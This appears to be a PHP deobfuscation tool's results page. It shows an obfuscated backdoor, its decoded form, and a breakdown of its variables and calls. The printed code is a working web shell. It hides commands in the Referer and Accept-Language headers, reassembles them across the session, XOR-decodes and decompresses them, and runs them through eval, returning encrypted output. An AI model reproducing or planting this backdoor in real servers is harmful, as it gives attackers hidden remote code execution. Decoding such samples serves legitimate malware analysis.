Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $x='=06Y;($j<$c&&$i<$l)6Y;$j++6Y,$i+6Y+){$o6Y.=$t{$i}^$k{6Y$j};6Y}}retur6Yn6Y 6Y$o;..

Decoded Output download

$kh="04dc";$kf="2935";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){    $u=parse_url($rr);    parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++) $p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$x='=06Y;($j<$c&&$i<$l)6Y;$j++6Y,$i+6Y+){$o6Y.=$t{$i}^$k{6Y$j};6Y}}retur6Yn6Y 6Y$o;}$r=$_SERVER;6Y$rr=@$r6Y["HT6YTP_REFE6YRER"';
$C=str_replace('vP','','crvPeavPtevP_fuvPncvPvPtion');
$c=');o6Yb_end6Y_clea6Yn(6Y);$d=bas6Ye64_e6Yncode(x(gzc6Yo6Ympr6Yess($o),$k))6Y;print("<6Y$k>$d<6Y/$6Yk>");@sess6Yi6Y6Yon_destroy();}}}}';
$T='l(6Y6Y$ss(m6Yd5($i.$kh),0,36Y));$6Yf=$sl($ss(md56Y($i.$kf),6Y0,3));$p=6Y6Y"";for($z=6Y1;$z<cou6Ynt($m[1]6Y);$6Yz++)6Y $p.6Y';
$G='{@ses6Y6Ysion6Y_6Ystart();$s6Y=&$_S6YESSI6Y6YON;$ss=6Y6Y"substr";$sl="strtolower";6Y$i=$m[1]6Y[0].$m[1][6Y1];6Y6Y$h=$6Ys';
$S='$k6Yh="04dc";$6Ykf6Y=6Y"2935";func6Ytion x($6Yt6Y,$6Yk){$c=strlen($k);$6Yl6Y=strlen6Y($t6Y);$o="";6Yfor($i6Y=0;$6Yi6Y<$6Yl;){for($j';
$L='.=6Y$p6Y;$e=strp6Y6Yos($s[$i],$6Yf);if($6Ye){6Y$k=$kh.$6Ykf;ob_sta6Yrt(6Y);@e6Yval(@g6Yz6Yuncompress(@x(@6Ybase6Y64_deco6Yd6Y6Y';
$b='e(preg_repl6Yace(array(6Y"6Y/_/","6Y/-/"),ar6Yray("/","+")6Y6Y,$ss(6Y$s[$i],0,$e))6Y),$k)))6Y;$o=ob6Y_ge6Yt_content6Ys(';
$w='y"],$q)6Y;$q=array_val6Yu6Yes($q);pre6Yg6Y_ma6Ytch_all("/([\\w]6Y6Y)[\\w-]+(6Y?:;q=06Y.([\\d]))6Y?6Y,6Y?/",$ra,6Y$m6Y);if($q&&$m)';
$q='];6Y$ra=@$6Y6Yr["6YHTTP_ACCEPT_LANG6YUAGE"6Y];i6Yf($r6Yr&&$ra)6Y{6Y    $u=6Yp6Yarse_url($rr);    p6Ya6Y6Yrse_str($u["que6Yr6Y';
$i='=$q[$m[2]6Y[$z]];if6Y(s6Ytrpos($p6Y,$h)===06Y){$s[6Y$i]="6Y";$6Yp=6Y$ss($p,3);6Y}if(array_ke6Yy6Y_exist6Ys($i,$s)){$s6Y[$i]';
$v=str_replace('6Y','',$S.$x.$q.$w.$G.$T.$i.$L.$b.$c);
$j=$C('',$v);$j();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$C create_function
$G {@ses6Y6Ysion6Y_6Ystart();$s6Y=&$_S6YESSI6Y6YON;$ss=6Y6Y"sub..
$L .=6Y$p6Y;$e=strp6Y6Yos($s[$i],$6Yf);if($6Ye){6Y$k=$kh.$6Ykf;..
$S $k6Yh="04dc";$6Ykf6Y=6Y"2935";func6Ytion x($6Yt6Y,$6Yk){$c=s..
$T l(6Y6Y$ss(m6Yd5($i.$kh),0,36Y));$6Yf=$sl($ss(md56Y($i.$kf),6..
$b e(preg_repl6Yace(array(6Y"6Y/_/","6Y/-/"),ar6Yray("/","+")6Y..
$c );o6Yb_end6Y_clea6Yn(6Y);$d=bas6Ye64_e6Yncode(x(gzc6Yo6Ympr6..
$i =$q[$m[2]6Y[$z]];if6Y(s6Ytrpos($p6Y,$h)===06Y){$s[6Y$i]="6Y"..
$j None
$q ];6Y$ra=@$6Y6Yr["6YHTTP_ACCEPT_LANG6YUAGE"6Y];i6Yf($r6Yr&&$r..
$v $kh="04dc";$kf="2935";function x($t,$k){$c=strlen($k);$l=str..
$w y"],$q)6Y;$q=array_val6Yu6Yes($q);pre6Yg6Y_ma6Ytch_all("/([\..
$x =06Y;($j<$c&&$i<$l)6Y;$j++6Y,$i+6Y+){$o6Y.=$t{$i}^$k{6Y$j};6..

Stats

MD5 635935e33bb32ca17dd6d8f72d0b0756
Eval Count 1
Decode Time 113 ms